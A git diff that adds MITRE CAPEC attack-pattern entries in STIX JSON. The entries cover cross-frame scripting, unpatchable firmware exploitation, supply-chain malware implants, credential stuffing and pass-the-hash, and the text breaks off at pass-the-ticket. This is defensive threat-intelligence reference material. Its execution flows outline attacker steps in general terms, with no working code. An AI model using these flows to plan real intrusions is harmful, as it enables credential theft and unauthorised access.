Vulnerabilities on Popular Sites, 2010--07---20", + "external_id": "REF-470", + "source_name": "reference_from_CAPEC", + "url": "https://seclab.stanford.edu/websec/framebusting/framebust.pdf" + } + ], + "id": "attack-pattern--0184fd4d-9134-42c0-b073-5e614773d408", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Cross Frame Scripting (XFS)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--ec41b2b3-a3b6-4af0-be65-69e82907dfef" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Cross Frame Scripting allows an adversary to steal sensitive data from a legitimate site.)" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Software" + ], + "x_capec_example_instances": [ + "An adversary-controlled webpage contains malicious Javascript and a concealed iframe containing a legitimate website login (i.e., the concealed iframe would make it appear as though the actual legitimate website was loaded). When the user interacts with the legitimate website in the iframe, the malicious Javascript collects that sensitive information." + ], + "x_capec_prerequisites": [ + "The user's browser must have vulnerabilities in its implementation of the same-origin policy. It allows certain data in a loaded page to originate from different servers/domains." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json new file mode 100644 index 0000000000000000000000000000000000000000..9f3949c0411eec4ba662053a070e754b85e0e803 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59.json @@ -0,0 +1,100 @@ +{ + "id": "bundle--a48ef11c-e5a4-47c1-a10f-ec909efbc56b", + "objects": [ + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may exploit vulnerable code (i.e., firmware or ROM) that is unpatchable. Unpatchable devices exist due to manufacturers intentionally or inadvertently designing devices incapable of updating their software. Additionally, with updatable devices, the manufacturer may decide not to support the device and stop making updates to their software.", + "external_references": [ + { + "external_id": "CAPEC-682", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/682.html" + }, + { + "external_id": "CWE-1277", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1277.html" + }, + { + "external_id": "CWE-1310", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1310.html" + }, + { + "description": "Alex Scroxton, Alarm bells ring, the IoT is listening, 2019--12---13, TechTarget", + "external_id": "REF-723", + "source_name": "reference_from_CAPEC", + "url": "https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening" + }, + { + "description": "Matthew Hughes, Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed, 2019--12---11, Situation Publishing", + "external_id": "REF-724", + "source_name": "reference_from_CAPEC", + "url": "https://www.theregister.com/2019/12/11/f_secure_keywe/" + }, + { + "description": "Brian Krebs, Zyxel Flaw Powers New Mirai IoT Botnet Strain, 2020--03---20, Krebs on Security", + "external_id": "REF-725", + "source_name": "reference_from_CAPEC", + "url": "https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/" + }, + { + "description": "Colin Schulz, Stefan Raff, Sebastian Kortmann, Nikolaus Obwegeser, Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm, 2021--12, International Conference on Information Systems (ICIS) 2021", + "external_id": "REF-726", + "source_name": "reference_from_CAPEC", + "url": "https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm" + } + ], + "id": "attack-pattern--01a08342-5c58-4f61-b8e1-997e444b3a59", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.\n ", + "\n Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

    2. Techniques
    Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

  1. Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

  1. Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

    2. Techniques
    Install malware on a device to recruit it for a botnet.
    Install malware on the device and use it for a ransomware attack.
    Gain root access and steal information stored on the device.
    Manipulate the device to behave in unexpected ways which would benefit the adversary.
", + "x_capec_extended_description": "When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Awareness of the hardware being leveraged.", + "Access to the hardware being leveraged, either physically or remotely." + ], + "x_capec_skills_required": { + "High": "Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely", + "Medium": "Knowledge of various wireless protocols to enable remote access to vulnerable devices" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json new file mode 100644 index 0000000000000000000000000000000000000000..a90fdaea504cc153ae9f155ea80c3afceeb912df --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--02570621-96aa-4525-b782-8e3939affac3.json @@ -0,0 +1,65 @@ +{ + "id": "bundle--fab6fa4f-6c5e-4e4a-ad4b-d3c31a9390a9", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker implants malicious software into the system in the supply chain distribution channel, with purpose of causing malicious disruption or allowing for additional compromise when the system is deployed.", + "external_references": [ + { + "external_id": "CAPEC-523", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/523.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Daniel Simpson, Dani Halfin, Andrews Mariano Gorzelany, Beth Woodbury, Supply chain attacks, 2021--10---28, Microsoft", + "external_id": "REF-716", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/supply-chain-malware" + } + ], + "id": "attack-pattern--02570621-96aa-4525-b782-8e3939affac3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Software Implanted", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--59ba3504-6764-48b4-980a-40e4adff2030" + ], + "x_capec_domains": [ + "Supply Chain" + ], + "x_capec_example_instances": [ + "An attacker has created a piece of malicious software designed to function as a backdoor in a system that is to be deployed at the victim location. During shipment of the system, the attacker has physical access to the system at a loading dock of an integrator for a short time. The attacker unpacks and powers up the system and installs the malicious piece of software, and configures it to run upon system boot. The system is repackaged and returned to its place on the loading dock, and is shipped and installed at the victim location with the malicious software in place, allowing the attacker to bypass firewalls and remotely gain access to the victim's network for further malicious activities." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine Entry Point: The adversary must first identify a system that they wish to target and search for an entry point they can use to install the malicious software. This could be a system which they have prior knowledge of, giving them insight into the software and environment.

    2. Techniques
    Use a JTAGulator to identify exposed JTAG and UART interfaces in smaller embedded systems.
    Identify exposed USB connectors that could be used to load software.

  2. Discover Vulnerability in Supply Chain: The adversary maps out the supply chain for the targeted system. They look for ooportunities to gain physical access to the system after it has left the manufacturer, but before it is deployed to the victim.

    3. Techniques
    Procure a system and observe the steps it takes in the shipment process.
    Identify possible warehouses that systems are stored after manufacturing.

Experiment

  1. Test Malicious Software: Before performing the attack in the wild, an adversary will test the attack on a system they have procured to ensure that the desired outcome will be achieved.

    2. Techniques
    Design malicious software that will give an adversary a backdoor into the system once it is deployed to the victim.
    Obtain already designed malicious software that just need to be placed into the system.

Exploit

  1. Implant Software in the Supply Chain: Using the vulnerability in the supply chain of the system discovered in the explore phase, the adversary implants the malicious software into the system. This results in the adversary gaining unintended access to systems once they reach the victim and can lead to a variety of follow up attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Physical access to the system after it has left the manufacturer but before it is deployed at the victim location." + ], + "x_capec_skills_required": { + "High": "Malicious software creation." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json new file mode 100644 index 0000000000000000000000000000000000000000..7b805afd53ea32f1d4d4d8926c59cd6bf47b3a8f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03093798-f245-4ed2-a085-88e69d303b11.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--b8cd0bd1-eed2-47b2-a25b-4a9ca536499c", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-407 : Social Information Gathering via Pretexting\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "external_id": "CAPEC-411", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/411.html" + } + ], + "id": "attack-pattern--03093798-f245-4ed2-a085-88e69d303b11", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Pretexting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json new file mode 100644 index 0000000000000000000000000000000000000000..0307a058a10aabe9fa1701cb3c6ba91d1efa6265 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a.json @@ -0,0 +1,153 @@ +{ + "id": "bundle--430ad2b5-d745-4d87-8bc4-aa14b8e2f12d", + "objects": [ + { + "created": "2020-07-30T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary tries known username/password combinations against different systems, applications, or services to gain additional authenticated access. Credential Stuffing attacks rely upon the fact that many users leverage the same username/password combination for multiple systems, applications, and services.\n ", + "external_references": [ + { + "external_id": "CAPEC-600", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/600.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "description": "Brute Force:Credential Stuffing", + "external_id": "T1110.004", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/004" + }, + { + "description": "Credential stuffing", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Alert (TA18-086A): Brute Force Attacks Conducted by Cyber Actors, 2018--03---27, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-567", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA18-086A" + }, + { + "description": "Credential stuffing, Open Web Application Security Project (OWASP)", + "external_id": "REF-568", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/attacks/Credential_stuffing" + }, + { + "description": "Jessica Silver-Greenberg, Matthew Goldstein, Nicole Perlroth, JPMorgan Chase Hacking Affects 76 Million Households, 2014--10---02, The New York Times", + "external_id": "REF-569", + "source_name": "reference_from_CAPEC", + "url": "https://dealbook.nytimes.com/2014/10/02/jpmorgan-discovers-further-cyber-security-issues/" + } + ], + "id": "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Credential Stuffing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--4e7abad3-5853-4e4b-a64e-7f23f10f8656", + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "attack-pattern--addd93c9-9278-4185-b402-e505d632c815", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user leverages the password \"Password123\" for a handful of application logins. An adversary obtains a victim's username/password combination from a breach of a social media application and executes a Credential Stuffing attack against multiple banking and credit card applications. Since the user leverages the same credentials for their bank account login, the adversary successfully authenticates to the user's bank account and transfer money to an offshore account.", + "In October 2014 J.P. Morgan's Corporate Challenge website was breached, resulting in adversaries obtaining multiple username/password pairs. A Credential Stuffing attack was then executed against J.P. Morgan Chase, which resulted in over 76 million households having their accounts compromised." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known credentials: The adversary must obtain known credentials in order to access the target system, application, or service.

    2. Techniques
    An adversary purchases breached username/password combinations or leaked hashed passwords from the dark web.
    An adversary leverages a key logger or phishing attack to steal user credentials as they are provided.
    An adversary conducts a sniffing attack to steal credentials as they are transmitted.
    An adversary gains access to a database and exfiltrates password hashes.
    An adversary examines outward-facing configuration and properties files to discover hardcoded credentials.

  2. Determine target's password policy: Determine the password policies of the target system/application to determine if the known credentials fit within the specified criteria.

    3. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc., or whether they are allowed to contain words from the dictionary).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks if multiple passwords are known for a single user account).

Experiment

  1. Attempt authentication: Try each username/password combination until the target grants access.

    2. Techniques
    Manually or automatically enter each username/password combination through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks of this kind often target management services over commonly used ports such as SSH, FTP, Telnet, LDAP, Kerberos, MySQL, and more. Additional targets include Single Sign-On (SSO) or cloud-based applications/services that utilize federated authentication protocols, and externally facing applications.\n The primary goal of Credential Stuffing is to achieve lateral movement and gain authenticated access to additional systems, applications, and/or services. A successfully executed Credential Stuffing attack could result in the adversary impersonating the victim or executing any action that the victim is authorized to perform.\n Although not technically a brute force attack, Credential Stuffing attacks can function as such if an adversary possess multiple known passwords for the same user account. This may occur in the event where an adversary obtains user credentials from multiple sources or if the adversary obtains a user's password history for an account.\n Credential Stuffing attacks are similar to Password Spraying attacks (CAPEC-565) regarding their targets and their overall goals. However, Password Spraying attacks do not have any insight into known username/password combinations and instead leverage common or expected passwords. This also means that Password Spraying attacks must avoid inducing account lockouts, which is generally not a worry of Credential Stuffing attacks. Password Spraying attacks may additionally lead to Credential Stuffing attacks, once a successful username/password combination is discovered.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The system/application uses one factor password based authentication, SSO, and/or cloud-based authentication.", + "The system/application does not have a sound password policy that is being enforced.", + "The system/application does not implement an effective password throttling mechanism.", + "The adversary possesses a list of known user accounts and corresponding passwords that may exist on the target." + ], + "x_capec_resources_required": [ + "A machine with sufficient resources for the job (e.g. CPU, RAM, HD).", + "A known list of username/password combinations.", + "A custom script that leverages the credential list to launch the attack." + ], + "x_capec_skills_required": { + "Low": "A Credential Stuffing attack is very straightforward." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json new file mode 100644 index 0000000000000000000000000000000000000000..a0950787ae1fe878d7fe95f0af506ba3da8bd05f --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--056a463d-6303-438e-a43f-992cee52fb95.json @@ -0,0 +1,139 @@ +{ + "id": "bundle--88f28930-9fa6-42d1-9bd4-aa7b8d8527a9", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary obtains (i.e. steals or purchases) legitimate Windows domain credential hash values to access systems within the domain that leverage the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "external_references": [ + { + "external_id": "CAPEC-644", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/644.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-836", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/836.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Hash", + "external_id": "T1550.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/002" + }, + { + "description": "Dan Goodin, Attackers can use Zoom to steal users’ Windows credentials with no warning, 2020--04---01, Ars Technica", + "external_id": "REF-575", + "source_name": "reference_from_CAPEC", + "url": "https://arstechnica.com/information-technology/2020/04/unpatched-zoom-bug-lets-attackers-steal-windows-credentials-with-no-warning/" + }, + { + "description": "Mor Levi, Assaf Dahan, Amit Serper, Operation Soft Cell: A Worldwide Campaign Against Telecommunications Providers, 2019--06---25, CyberReason", + "external_id": "REF-580", + "source_name": "reference_from_CAPEC", + "url": "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers" + }, + { + "description": "Mitigating Pass-the-Hash and Other Credential Theft v2, Microsoft Corporation", + "external_id": "REF-581", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "How Pass-the-Hash works, Microsoft Corporation", + "external_id": "REF-582", + "source_name": "reference_from_CAPEC", + "url": "https://docs.microsoft.com/en-us/previous-versions/dn785092(v=msdn.10)?redirectedfrom=MSDN" + }, + { + "description": "Bashar Ewaida, Pass-the-hash attacks: Tools and Mitigation, 2010--02---23, The SANS Institute", + "external_id": "REF-583", + "source_name": "reference_from_CAPEC", + "url": "https://www.sans.org/reading-room/whitepapers/testing/paper/33283" + } + ], + "id": "attack-pattern--056a463d-6303-438e-a43f-992cee52fb95", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Use of Captured Hashes (Pass The Hash)", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3", + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80", + "attack-pattern--191fbdab-d3b3-4ffd-8829-51331c20eaa7" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Authorization": [ + "Read Data" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Adversaries exploited the Zoom video conferencing application during the 2020 COVID-19 pandemic to exfiltrate Windows domain credential hash value pairs from a target system. The attack entailed sending Universal Naming Convention (UNC) paths within the Zoom chat window of an unprotected Zoom call. If the victim clicked on the link, their Windows usernames and the corresponding Net-NTLM-v2 hashes were sent to the address contained in the link. The adversary was then able to infiltrate and laterally move within the Windows domain by passing the acquired credentials to shared network resources. This further provided adversaries with access to Outlook servers and network storage devices. [REF-575]", + "Operation Soft Cell, which has been underway since at least 2012, leveraged a modified Mimikatz that dumped NTLM hashes. The acquired hashes were then used to authenticate to other systems within the network via Pass The Hash attacks. [REF-580]" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Acquire known Windows credential hash value pairs: The adversary must obtain known Windows credential hash value pairs of accounts that exist on the domain.

    2. Techniques
    An adversary purchases breached Windows credential hash value pairs from the dark web.
    An adversary conducts a sniffing attack to steal Windows credential hash value pairs as they are transmitted.
    An adversary gains access to a Windows domain system/files and exfiltrates Windows credential hash value pairs.
    An adversary examines outward-facing configuration and properties files to discover hardcoded Windows credential hash value pairs.

Experiment

  1. Attempt domain authentication: Try each Windows credential hash value pair until the target grants access.

    2. Techniques
    Manually or automatically enter each Windows credential hash value pair through the target's interface.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system, or to laterally move within the domain

  2. Spoofing: Malicious data can be injected into the target system or into other systems on the domain. The adversary can also pose as a legitimate domain user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within domain systems or applications.

", + "x_capec_extended_description": "\n When authenticating via LM or NTLM, an authenticating account's plaintext credentials are not required by the protocols for successful authentication. Instead, the hashed credentials are used to determine if an authentication attempt is valid. If an adversary can obtain an account's hashed credentials, the hash values can then be passed to a system or service to authenticate, without needing to brute-force the hashes to obtain their cleartext values. Successful Pass The Hash attacks result in the adversary fully authenticating as the targeted account, which can further allow the adversary to laterally move within the network, impersonate a legitimate user, and/or download/install malware to systems within the domain. This technique can be performed against any operating system that leverages the LM or NTLM protocols even if the operating system is not Windows-based, since these systems/accounts may still authenticate to a Windows domain.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system/application is connected to the Windows domain.", + "The system/application leverages the Lan Man (LM) and/or NT Lan Man (NTLM) authentication protocols.", + "The adversary possesses known Windows credential hash value pairs that exist on the target domain." + ], + "x_capec_resources_required": [ + "A list of known Window credential hash value pairs for the targeted domain." + ], + "x_capec_skills_required": { + "Low": "Once an adversary obtains a known Windows credential hash value pair, leveraging it is trivial." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "spec_version": "2.0", + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json new file mode 100644 index 0000000000000000000000000000000000000000..c4ce88d7e2fee276a5b2d25b9252b6896061f6d9 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.0/attack-pattern/attack-pattern--05740120-81ef-4224-9805-2f0b54d1111f.json @@ -0,0 +1,83 @@ +{ + "id": "bundle--ac9e8470-4635-4e2b-b6ed-f46e5ee678c1", + "objects": [ + { + "created": "2018-07-31T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary uses stolen Kerberos tickets to access systems/resources that leverage the Kerberos authentication protocol. The Kerberos authentication protocol centers around a ticketing system which is used to request/grant access to services and to then access the requested services. An adversary can obtain any one of these tickets (e.g. Service Ticket, Ticket Granting Ticket, Silver Ticket, or Golden Ticket) to authenticate to a system/resource without needing the account's credentials. Depending on the ticket obtained, the adversary may be able to access a particular resource or generate TGTs for any account within an Active Directory Domain.", + "external_references": [ + { + "external_id": "CAPEC-645", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/645.html" + }, + { + "external_id": "CWE-522", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/522.html" + }, + { + "external_id": "CWE-294", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/294.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "description": "Use Alternate Authentication Material:Pass The Ticket", + "external_id": "T1550.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1550/003" + }, + { + "description": "BRONZE BUTLER Targets Japanese Enterprises, 2017--10---12, Secureworks® Counter Threat Unit™ Threat Intelligence", + "external_id": "REF-584", + "source_name": "reference_from_CAPEC", + "url": "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + } + ], + "id": 